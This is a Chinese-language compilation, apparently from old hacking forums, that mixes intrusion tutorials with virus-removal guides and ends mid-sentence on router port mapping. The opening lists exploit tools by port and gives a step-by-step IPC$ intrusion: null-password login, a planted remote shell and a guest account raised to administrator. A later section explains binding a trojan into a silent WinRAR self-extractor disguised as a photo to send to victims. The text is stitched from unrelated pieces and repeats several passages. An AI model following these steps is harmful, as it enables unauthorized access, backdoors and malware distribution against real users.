3. 3899的入侵对很早的机器，可以试试3389的溢出(win3389ex.exe) 对2000的机器，可以试试字典暴破。(tscrack.exe)
4. 80入侵对sp3以前的机器，可以用webdav入侵；对bbs论坛，可以试试上传漏洞（upfile.exe或dvup_delphi.exe）可以利用SQL进行注入。（啊D的注入软件）。
5. serv-u入侵(21端口）对5. 004及以下系统，可用溢出入侵。（serv5004.exe）对5.1.0.0及以下系统，可用本地提升权限。（servlocal.exe）对serv-u的MD5加密密码，可以用字典暴破。（crack.vbs）输入一个被serv-u加密的密码（34位长），通过与字典档（dict.txt）的比较，得到密码
6. 554端口用real554.exe入侵。
7. 6129端口用DameWare6129.exe入侵。
8. 系统漏洞利用135、445端口，用ms03026、ms03039、ms03049、ms04011漏洞，进行溢出入侵。
9. 3127等端口可以利用doom病毒开的端口，用nodoom.exe入侵。（可用mydoomscan.exe查）。
10. 其他入侵利用shanlu的入侵软件入侵（WINNTAutoAttack.exe）。

经典IPC$入侵
1. C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators" 这是用"流光"扫到的用户名是administrators，密码为"空"的IP地址(气好到家如果是打算攻击的话，就可以用这样的命令来与127.0.0.1建立一个连 接，因为密码为"空"，所以第一个引号处就不用输入，后面一个双引号里的是用户名 ，输入administrators，命令即可成功完成。　　
2. C:\>copy srv.exe $">\\127.0.0.1\admin$ 先复制srv.exe上去，在流光的Tools目录下就有（这里的$是指admin用户的 c:\winnt\system32\，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了）。 　　
3. C:\>net time \\127.0.0.1 查查时间，发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00，命令成功完成。　　
4. C:\>at \\127.0.0.1 11:05 srv.exe 用at命令启动srv.exe吧（这里设置的时间要比主机时间快，不然你怎么启动啊. 　　
5. C:\>net time \\127.0.0.1 再查查到时间没有？如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05，那就准备 开始下面的命令。　　
6. C:\>telnet 127.0.0.1 99 这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的 是SRV在对方计算机中为我们建立一个99端口的Shell。虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打 算建立一个Telnet服务！这就要用到ntlm了　　
7.C:\>copy ntlm.exe $">\\127.0.0.1\admin$ 用Copy命令把ntlm.exe上传到主机上（ntlm.exe也是在《流光》的Tools目录中）。　　
8. C:\WINNT\system32>ntlm 输入ntlm启动（这里的C:\WINNT\system32>指的是对方计算机，运行ntlm其实是让这 个程序在对方计算机上运行）。当出现"DONE"的时候，就说明已经启动正常。然后使 用"net start telnet"来开启Telnet服务！
9. Telnet 127.0.0.1，接着输入用户名与密码就进入对方了，操作就像在DOS上操作 一样简单！(然后你想做什么?想做什么就做什么吧,哈哈) 为了以防万一,我们再把guest激活加到管理组
10. C:\>net user guest /active:yes 将对方的Guest用户激活
11. C:\>net user guest 1234 将Guest的密码改为1234,或者你要设定的密码
12. C:\>net localgroup administrators guest /add 将Guest变为Administrator

一、


手动清除方法：
1.开始＝》运行＝》taskmgr，启动任务管理器。在其中查找msblast.exe进程，找到后在进程上单击右键，选择“结束进程”，点击“是”。
2.检查系统的%systemroot%system32目录下（Win2K一般是C:WINNTSystem32）是否存在msblast.exe文件，如果有，删除它。
注意－必须先结束msblast.exe在系统中的进程才可以顺利的删除它。
3.开始＝》运行＝》regedit，启动注册表编辑器。在注册表中找到HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun,
删除其下的“windowsautoupdate"="msblast.exe”键值。
4.在DOS窗口打入netstat-an来查看是否还有病毒在快速的向外部发送packets。
这样可以清除蠕虫病毒在系统中的驻留，不过仍然建议大家使用正版的杀毒软件对系统进行全面的检测，以求万无一失。
专门查杀冲击波病毒的工具
http://download.rising.com.cn/zsgj/ravblaster.exe

——》1，中了“三波”病毒中的任何一种，电脑会弹出对话框说windows的services.exe意外终止，一分钟后电脑重启，然后开始倒计时。所谓“三波”病毒，即冲击波、震荡波、急速波病毒。

——》2，首先在弹出对话框时，快速点击“开始”－“运行”，然后键入：
shutdown /a
如果可以阻止住关机，请继续执行第4步，否则请执行第3步。

——》3，如果你无法阻止住关机，你可以在机器重新启动初期，按F8键，然后进入“安全模式”。

——》4，找一个可以上网的机器，或者是在重启动对话框没有弹出的时候，下载补丁。

——》5，微软官方补丁下载地址：

冲击波：
http://www.microsoft.com/china/security/Bulletins/MS03-026.asp

震荡波：
http://www.microsoft.com/china/t ... letin/ms04-011.mspx

急速波：
http://www.microsoft.com/china/t ... letin/MS05-039.mspx

——》6，分别安装上述三个补丁，此时应该不会再出现重新启动对话框了。

——》7，然后下载专杀工具，杀毒。

——》8，专杀工具：

冲击波(Worm.Blaster)病毒专杀工具：
http://download.rising.com.cn/zsgj/ravblaster.exe

震荡波(Worm.Sasser)病毒专杀工具：
http://download.rising.com.cn/zsgj/RavSasser.exe

极速波(I-Worm/Zobot)病毒专杀工具：
http://update2.jiangmin.com/kvrt.exe




“中招”用户无法正常上网 安全专家教你怎样清除“冲击波”病毒


（瑞星公司）


8月12日“冲击波”病毒在国内泛滥，仅12日一天瑞星公司技术支持部门就接到上千个企事业单位局域网瘫痪的求助电话，并推出紧急上门救援的服务。瑞星杀毒软件已经在12日晚上紧急升级并发布了免费的专杀工具。到目前为止，这个病毒仍然在国内肆虐，“中招”用户数量巨大、难以统计。

目前最严重的问题是，已经“中招”的用户怎么办？

被“冲击波”病毒感染的机器，最常见的现象就是系统在启动1分钟后就反复重启，用户这时候根本就没有时间上网去下载专杀工具或打补丁，那该怎么办呢？瑞星反病毒专家告诉你一个办法，让你在一分钟之内搞定系统。用户在进行以下操作时，必须先将网络断开，以防止计算机重复感染。

一、 使用启动盘，在DOS环境下清除病毒

1. 当用户中招出现以上现象后，用DOS系统启动盘启动进入DOS环境下，进入C盘的操作系统目录.
操作命令集：
C:
CD C:\windows (或CD　c:\winnt)

2. 查找目录中的“msblast.exe”病毒文件。
命令操作集：
dir msblast.exe /s/p

3.找到后进入病毒所在的子目录，然后直接将该病毒文件删除。
Del msblast.exe

二、 进入安全模式，手工清除病毒

如果用户手头没有DOS启动盘，还有一个方法，就是启动系统后进入安全模式，然后搜索C盘，查找msblast.exe文件，找到后直接将该文件删除，然后再次正常启动计算机即可。

三、 下载更新系统补丁

当用户手工清除了病毒体后，应上网下载相应的补丁程序，用户可以先进入微软网站，下载相应的系统补丁，给系统打上补丁。

以下是补丁的具体下载地址：
· >>Windows 2000

· >>Windows XP 32 位版本 ：

用户也可以直接登陆瑞星网址：
http://it.rising.com.cn/newSite/Channels/info/virus/
TopicDatabasePackage/12-145900547.htm来下载相应的微软补丁程序。

注意：如果用户在手工清除完病毒后，在去上网下载补丁包时，计算机再次感染病毒并重启，这时就只能再次用手工清除该病毒，然后通过没感染该病毒的计算机下载相应的补丁，给系统打补丁，然后再做其它操作。

四、 打完补丁后，用户应下载一个瑞星专杀工具

http://it.rising.com.cn/service/technology/RS_blaster.htm，再次清除一下系统。如果是瑞星的用户，在打完补丁后可直接到瑞星网站将瑞星杀毒软件升级到最新版，打开实时监控即可。

防网页木马的办法

　　教大家防木马的办法，只针对网页木马，有效率90%以上，可以防止90%以上木马在你的机器上被执行，甚至杀毒软件发现不了的木马都可以禁止执行。先说一下原理。

　　现在网页木马无非有以下几种方式中到你的机器里

　　1：把木马文件改成BMP文件，然后配合你机器里的DEBUG来还原成EXE，网上存在该木马20%

　　2：下载一个TXT文件到你机器，然后里面有具体的FTP^-^作，FTP连上他们有木马的机器下载木马，网上存在该木马20%

　　3：也是最常用的方式，下载一个HTA文件，然后用网页控件解释器来还原木马。该木马在网上存在50%以上

　　4：采用JS脚本，用VBS脚本来执行木马文件，该型木马偷QQ的比较多，偷传奇的少，大概占10%左右

　　5：其他方式未知。。。。。。。。。。。。。

　　现在我们来说防范的方法。。。。。。。。。不要丢金砖

　　那就是把 windows\system\mshta.exe文件改名，

　　改成什么自己随便 (s个屁和瘟2000是在system32下)

　　HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\ 下为Active Setup controls创建一个基于CLSID的新键值 {6E449683_C509_11CF_AAFA_00AA00 B6015C}，然后在新键值下创建一个REG_DWORD 类型的键Compatibility，并设定键值为0x00000400即可。

　　还有windows\command\debug.exe和windows\ftp.exe都给改个名字 (或者删除)

　　一些最新流行的木马 最有效果的防御~~

　　比如网络上流行 的木马 smss.exe 这个是其中一种木马的主体,潜伏在 98/winme/xp c:\windows目录下 2000 c:\winnt .....

　　假如你中了这个木马,首先我们用进程管理器结束 正在运行的木马smss.exe,然后在C:\windows 或 c:\winnt\目录下创建一个smss.exe 并设置为只读属性~ （2000/XP NTFS的磁盘格式的话那就更好 可以用“安全设置”设置为读取）这样木马没了~ 以后也不会再感染了。这个办法本人测试过对很多木马，都很有效果的。

　　经过这样的修改后，我现在专门找别人发的木马网址去测试，实验结果是上了大概20个木马网站，有大概15个瑞星会报警，另外5个瑞星没有反映，而我的机器没有添加出来新的EXE文件，也没有新的进程出现，只不过有些木马的残骸留在了IE的临时文件夹里，他们没有被执行起来，没有危险性，所以建议大家经常清理临时文件夹和IE。

利用WinRAR  制作新的捆绑方法，同样实用，更能使人中招。
    进行这种捆绑工作，要做好一些准备工作：
    1.助手机器
    下载地址：http://www.07cn.com/bbs/up/oadimages/200321811594574375.rar
      这个软件的功能是指定的文件复制到系统目录中，并运行相应的文件！
    它有两个程序：助手机器（主机器）.exe和子机器.exe
      助手机器（主机器）的功能是生成一个“菜单文件”（就是让子机器生成的“菜单文件”来作相应的操作）。
    子机器的功能就是从主机器生成的“菜单文件”里读出命令并执行。
    2.黑影木马
    下载地址：http://www.51cnet.com/imagesh/show.asp?id=643
      一个比较新的木马，很多杀毒软件都不能查杀它，包括：黑影.exe（客户端），服务
端.exe（木马端），以及3个系统文件。
    3.新版WinRAR压缩软件
    不用我介绍，大家也知道它是什么！
    将它们都存放在同一个文件夹中，下面我们就开始进行捆绑工作了。
                      一.配置执行命令
    先运行“助手机器（主机器）.exe”来配置命令菜单。
    1.在“复制文件”一栏中输入“mswinsck.ocx”后，按“添加”将它们添加到列表
中，照此方法添加“服务端.exe”到列表中，并把“服务端.exe”一项勾选上。
    {提示：这样做的目的是当对方打开捆绑木马后会自动运行此木马文件，系统会把木马文件复制到system目录中，达到隐藏的目的。}
      2.在“删除文件”一栏输入“mswinsck.ocx”后，按“添加”进行添加，按照这样的方法添加好“服务端.exe”一项。
    3.我们捆绑木马就是要迷惑对方来达到让对方运行的目的，所以，还要捆绑一些用来迷惑对方的文件，比如图片.Flash等等，我在这里捆绑一个名为“我的照片”的图片文件来迷惑对方。所以在“运行文件”一栏里添加了文件“我的照片.gif”。
    4.一切完毕后，点“生成菜单”按照生成一个菜单命令文件，软件会提示我们成功
了，并会自动在刚才存放“助手机器”的文件夹中生成命令文件：Data.dat 。
    命令配置好了，下面就差捆绑黑影木马了！
                    二.捆绑木马
    1.将要用的文件，包括：子机器.exe（可以改名：我修改为“我的照片”）和data.
dat（刚才生成的命令文件），在上面点击右键，将它们一起打包进一个压缩档案里，并将
“存档选项”中的“创建自释放格式的档案文件”项目选择，再点“高级”标签，选择里面的“自释放选项”。
    2.然后在弹出的“高级自释放选项”设置窗口中，选择“常规”项，将“释放路径”
设置为要释放的文件路径，我在这里设置为“在program files中创建”，并在上面的窗口中输入一个目录名。
    3.在“安装程序”里的“释放后运行”里输入“我的照片.exe”（这里一定要用这个
程序名）。
    4.然后点“高级自释放选项”窗口中的“模式”项。在“缄默模式”项里选“全部隐藏”；再在“覆盖方式”里选“跳过已存在的文件”。
    5.然后点“高级自释放选项”窗口中的“文件和图标”。在“自定义自释放文件图
标”里选取一个迷惑性很强的图标。
    确定后生成一个exe格式的自释放压缩包，这个就是已经作成的捆绑木马（是个exe
文件），威力巨大，可要小心哦，杀毒软件可查杀不了它！
    把它发给要黑的人，对方只要打开了这个文件，就自动运行了木马中招了。这时候你可以打开黑影木马的控制端对其进行远程控制了！
    你可能说这么列害呀！万一别人用这个方法黑我怎么办？呵呵！不用担心，“一物降一物”嘛！
                       三.防范方法
    你可以在对方发过来的一些exe格式的文件上右击鼠标，观察是否含有“用WinRAR释放......”等指令项，如果有，千万别动它，赶快彻底删除吧！

今天真是个值得记住的日子，和一个病毒的战斗，从上午一直到下午，唉，老了。。。不过，这个鬼东西还是很有点意思的，写下战斗的整个过程，与各位共享之，也希望能帮到和我一样情况的朋友们。灰鸽子也就是backdoor.gpigeon。
　　事情的起因，昨天晚上我在看易中天的品三国呢，突然跳出来一个窗口，访问的是这个网址： （如果访问需小心中毒！）  
  
  
　　我就想看看是什么情况，就看了一下代码，是加密的，解密后如下：
　　后面的代码我就不帖完整了，反正是个恶心的人，估计想盗QQ密码，也怪我自己，一时起了好奇心就把这个病毒下载下来，关了防火墙后运行了一下，觉得不声不响就让我中招了也有点儿意思，想看看到底会怎么样。当时没什么反应，用w32dasm也没看出来什么，当时很晚，也就睡觉去了。
　　早上打开电脑开始准备工作时，好戏开始了。。。
　　首先是explorer.exe报错，关闭，接着是病毒防火墙开始哼哼了，说有XXX病毒，我也没在意，就让杀毒软件杀了，结果不行，卡巴不行，又试了360安全卫士，看看是不是什么流氓插件搞的鬼。结果报注册表里有问题，服务里也增加了新的未知服务，但都不能修复。
　　我就进了安全方式，用卡巴和360杀。。。。不行。。。
　　这下子我兴趣来了，看看到底怎么了，打开进程管理器，发现有两个smss.exe，其中一个的pid很高，不用说，肯定就是它搞鬼了，终止！
　　再用卡巴杀，OK了，都可以清除了。
　　偶就开始上网，准备工作，没一会，QQ又出错了，而且，那个鬼网站又弹出，我知道问题没有那么简单。。。。病毒肯定还在。
　　但是进程里已经没有什么不对劲的地方了，我想到，应该是用的dll注入。。。。
　　进入安全方式，卡巴已经报说服务已经出错，不能运行！这时候我想到，应该是中了比较厉害的木马了，有反杀毒软件能力，这时我想起了灰鸽子、广外女生。。。。
　　于是我卸载了卡巴5，装了卡巴6，这时候只想早点开始工作。。。。
　　卡巴6升到最新后查出了system32目录下有lsass.dll 和 lsasskey.dll 还有若干exe文件，一看名字，果然灰鸽子嘛。。。。
　　这肯定是一个新的版本，因为2005版的鸽子以前宰过。
　　回想了一下，连同我自己发现的，大概有这么一些文件是有毒的：
　　windows 与 system32目录下的 .com文件 ?.exe iexplorer.pif、scvhost.exe 。。。。。
　　system32\drivers\下的 smss.exe lsass.dll lsasskey.dll lsass.exe
　　还有其它一些，现在已经记不得了，大概一起至少有20个左右的病毒文件，其中还打包了盗QQ的程序。
　　病毒还改变了exe文件的打开方式，导致系统里很多程序在杀除部分后不能运行，每次我都要手动修复注册表。
　　（regedit.exe 要改成regedit.com才能用）
　　我先用天网禁止了系统进行如rundll32 explorer.exe访问网络，免得数据和密码泄漏。然后用卡巴开始杀！
　　lsass.dll和lsasskey.dll每次都说重启后杀除，但实际上杀不掉。
　　我上网找了一下，在卡卡社区里看到了类似的案例，但我没想到，我遇到的这个更麻烦。。。。
　　按网上说的，安全模式下，我准备手动清除，没想到，在卡马提示的目录下，居然没有这个文件，而且过一会后，系统很多目录都提示没有权限访问，这个臭鸽子，竟然连系统的api都监控了，又恨又佩服作者，净搞这些个无聊的事。
　　这时候，网上的办法已经没有什么帮助了，下载的瑞星的专杀工具也检测不到。。。
　　我开始了第二阶段的战斗：
　　拿出了98的光盘，在DOS模式下，用 dir /a 命令见到了在system32\drivers目录下的这些鬼，用deltree清理，这时已经下午了。删除完后，觉得应该没问题了，重启一下去吃东西了。。。给这家伙害的中饭还没吃呢。。。。
　　等吃点东西回来一看，卡巴又说发现了lsass.dll 和 lsasskey.dll，我郁闷！！
　　看来，应该是用了驱动技术加载了病毒，真是烦啊，没办法，开始找我的工具。。。。。
　　准备武器如下：filemon regmon hijackthis icesword killbox sreng2( system repair engineer)
　　老子拼啦！ -_-
　　PS：icesword运行出错，不知道是不是鸽子捣乱的，唉它现在已经加入了Rootkit.Vanti，真不知道下一个版本。。。。
　　下面是杀除的具体过程：
　　先用process explorer 找到了smss和windows下的scvhost.exe，结束掉。
　　运行了一下，原始的病毒文件，用filemon 和 regmon 记录了一下所产生的文件和修改的注册表。使用用killbox删除，看不到的重启到dos下删除，接着修复注册表中exe的打开方式，及与IE相关的一些设置。停止假scvhost开启的服务。
　　至于驱动方式启动的病毒文件，sreng2里找到了不少，现在记不清哪些是鸽子的了，不过，\??\开头的大家就要注意看，我是只要可疑的都干掉了。。。
　　重启后，用卡巴6杀掉了一些“残兵”（因为前面没有做记录和截图，所以只有这里我附了一个图片，大家可以看一下。），系统终于恢复正常了。。。。后来又用360安全卫士修复了一些设置，已经快到下班的时间了。今天算是献给了亲爱的鸽子了。。。。
　　不过，我后来想，如果用系统还原应该也可以，不过前提是先把染毒的文件清除，再做系统还原，也应该是一样的效果。
　　如果有什么错漏的地方，还请各位朋友指正，相互交流。
　　题外话：鸽子做到这种程度，再说自己是什么合法软件未免可笑，加载的这些驱动，开启的服务都会引起系统的不稳定，这种行为低劣病毒，实在不应该穿着合法的外衣了。。。。
　　搜索帮助： 灰鸽子专杀 手动清除灰鸽子 灰鸽子清除 lsasskey.dll病毒 lsass.dll 怎么办

原创精华区里的[手动干掉机器中杀毒软件清除不掉的木马]症状差不多...可我吃

了不少苦头.

一点点杀毒心得.希望对一些像我这么菜的朋友有帮助!!

刚起床,去百度没逛一会儿,突然一闪四个QQ同时掉线!
有警觉性的朋友应该会马上打开进程.
一看.进程里有两个winlogon.exe而且一个还是全大写的.
打开msconfig.发现里面Torjan Program C:\WINDOWS\WINLOGON.EXE.
搞清了状况就开始清除工作.
木马有非常狡猾的隐藏属性.
我们用attrib WINLOGON.exe -r -h -s让去除隐藏属性让他显形.
看到一红色底盘,黑色龙的图标.好像是一木马传奇.
然后用瑞星查一下.居然没反应.
接下来就开始痛苦的手工清除过程.
先结束该进程.然后删了C:\WINDOWS\WINLOGON.exe这文件.
打开注册表

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run清理启

动项.
看来看去.只有一项!
关闭注册表,重启...

第二次:
惊讶!瑞星杀毒软件和防火墙加载失败!
我试着打开瑞星防火墙,提示内存读写错误!这木马够毒!
我试着从自己的工具箱里找出一个叫:流行病毒杀工具.
运行..机子马上出现蓝屏!晕...

第三次:
还真厉害!我想了想,居然是个木马,那就下个木马专杀的工具.
请教了朋友.朋友推荐使用木马杀客.到天空下了一个.闪电杀毒.开始报警了
查杀完毕进入病毒隔离区删除重启!

第四次:
瑞星杀毒软件和防火墙依然加载失败!
进程里还是出现WINLOGON.exe(有点点耐不住了!)依然手工查杀.
运行REGEDIT，发现HKCR：EXE/EXEFILES被修改为WINFILES，描述为EXE关联被修

改.导入exe文件关联修复文件.
Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="\"%1\" %*"
没啥效果?!!!
(约会了两个小时回来了)

继续!!

第五次:
进入安全模式!二话不说打开木马杀客狂扫.又是那十一个病毒!扫完.重启...

第六次:
查看进程.发现WINLOGON.exe进程没了.不过新的问题又出现了.
就是exe关联修复问题.所以可运行程序打开都会让你选择程序!
而且你在右键桌面属性的时候会提示找不到c:\windows\system32\rundll32..这

文件...晕!现在什么东西都不能上.
这时我想到了.新建记事本cmd.exe另类为.bat文件!这能我不是可以使用CMD吗?
然后上了Q.问清系统版本.让师傅传了一rundll32文件过来,覆盖!!!还是没反应!
无奈......(凌晨1点钟!)
难道只要将EXE文件与“exefile”关联，故障就会解决？于是在命令行输入：

assoc .exe=exefile
打开运行程序一试.正常运行...然后收拾残局...


潜伏在C:\WINDOWS\system32\abad.exe.图标为黑色龙.红色底盘的病毒源.手工清除.

如果是冲击波楼主看看下面的东西能否帮助你的呢：）


手动清除方法：
1.开始＝》运行＝》taskmgr，启动任务管理器。在其中查找msblast.exe进程，找到后在进程上单击右键，选择“结束进程”，点击“是”。
2.检查系统的%systemroot%system32目录下（Win2K一般是C:WINNTSystem32）是否存在msblast.exe文件，如果有，删除它。
注意－必须先结束msblast.exe在系统中的进程才可以顺利的删除它。
3.开始＝》运行＝》regedit，启动注册表编辑器。在注册表中找到HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun,
删除其下的“windowsautoupdate"="msblast.exe”键值。
4.在DOS窗口打入netstat-an来查看是否还有病毒在快速的向外部发送packets。
这样可以清除蠕虫病毒在系统中的驻留，不过仍然建议大家使用正版的杀毒软件对系统进行全面的检测，以求万无一失。
专门查杀冲击波病毒的工具
http://download.rising.com.cn/zsgj/ravblaster.exe

——》1，中了“三波”病毒中的任何一种，电脑会弹出对话框说windows的services.exe意外终止，一分钟后电脑重启，然后开始倒计时。所谓“三波”病毒，即冲击波、震荡波、急速波病毒。

——》2，首先在弹出对话框时，快速点击“开始”－“运行”，然后键入：
shutdown /a
如果可以阻止住关机，请继续执行第4步，否则请执行第3步。

——》3，如果你无法阻止住关机，你可以在机器重新启动初期，按F8键，然后进入“安全模式”。

——》4，找一个可以上网的机器，或者是在重启动对话框没有弹出的时候，下载补丁。

——》5，微软官方补丁下载地址：

冲击波：
http://www.microsoft.com/china/security/Bulletins/MS03-026.asp

震荡波：
http://www.microsoft.com/china/t ... letin/ms04-011.mspx

急速波：
http://www.microsoft.com/china/t ... letin/MS05-039.mspx

——》6，分别安装上述三个补丁，此时应该不会再出现重新启动对话框了。

——》7，然后下载专杀工具，杀毒。

——》8，专杀工具：

冲击波(Worm.Blaster)病毒专杀工具：
http://download.rising.com.cn/zsgj/ravblaster.exe

震荡波(Worm.Sasser)病毒专杀工具：
http://download.rising.com.cn/zsgj/RavSasser.exe

极速波(I-Worm/Zobot)病毒专杀工具：
http://update2.jiangmin.com/kvrt.exe



目前最严重的问题是，已经“中招”的用户怎么办？

被“冲击波”病毒感染的机器，最常见的现象就是系统在启动1分钟后就反复重启，用户这时候根本就没有时间上网去下载专杀工具或打补丁，那该怎么办呢？瑞星反病毒专家告诉你一个办法，让你在一分钟之内搞定系统。用户在进行以下操作时，必须先将网络断开，以防止计算机重复感染。

一、 使用启动盘，在DOS环境下清除病毒

1. 当用户中招出现以上现象后，用DOS系统启动盘启动进入DOS环境下，进入C盘的操作系统目录.
操作命令集：
C:
CD C:\windows (或CD　c:\winnt)

2. 查找目录中的“msblast.exe”病毒文件。
命令操作集：
dir msblast.exe /s/p

3.找到后进入病毒所在的子目录，然后直接将该病毒文件删除。
Del msblast.exe

二、 进入安全模式，手工清除病毒

如果用户手头没有DOS启动盘，还有一个方法，就是启动系统后进入安全模式，然后搜索C盘，查找msblast.exe文件，找到后直接将该文件删除，然后再次正常启动计算机即可。

三、 下载更新系统补丁

当用户手工清除了病毒体后，应上网下载相应的补丁程序，用户可以先进入微软网站，下载相应的系统补丁，给系统打上补丁。

以下是补丁的具体下载地址：
· >>Windows 2000

· >>Windows XP 32 位版本 ：

用户也可以直接登陆瑞星网址：
http://it.rising.com.cn/newSite/Channels/info/virus/
TopicDatabasePackage/12-145900547.htm来下载相应的微软补丁程序。

注意：如果用户在手工清除完病毒后，在去上网下载补丁包时，计算机再次感染病毒并重启，这时就只能再次用手工清除该病毒，然后通过没感染该病毒的计算机下载相应的补丁，给系统打补丁，然后再做其它操作。

四、 打完补丁后，用户应下载一个瑞星专杀工具

http://it.rising.com.cn/service/technology/RS_blaster.htm，再次清除一下系统。如果是瑞星的用户，在打完补丁后可直接到瑞星网站将瑞星杀毒软件升级到最新版，打开实时监控即可。

1,首先进行端口映射,因为大家用的是ADSL.他的猫本来就有映射功能,所以不必使用什么映射软件，那样太浪费CPU资源了.怎么用呢?哈哈，首先大家点击开始然后运行IPCONFIG
看见没有，有个网关，好像是最后一行,那个网关就是你设置那个猫的IP,然后怎用呢?只要在IE打开那个IP就可以了.我的显示是10.0.0.138那么我在IE里面输入10.0.0.138就可以了，下面说一下具体设置办法~
以在内部pc 192.168.1.2 上架设 mail server 为例，mail server 的 SMTP 默认端口是25
阿尔卡特Speed Touch 515 设置端口映射
先进入Modem的Web设置页面。
打开左边的“Configuration”菜单，点击“Security”项。
点击右下方格中的“Config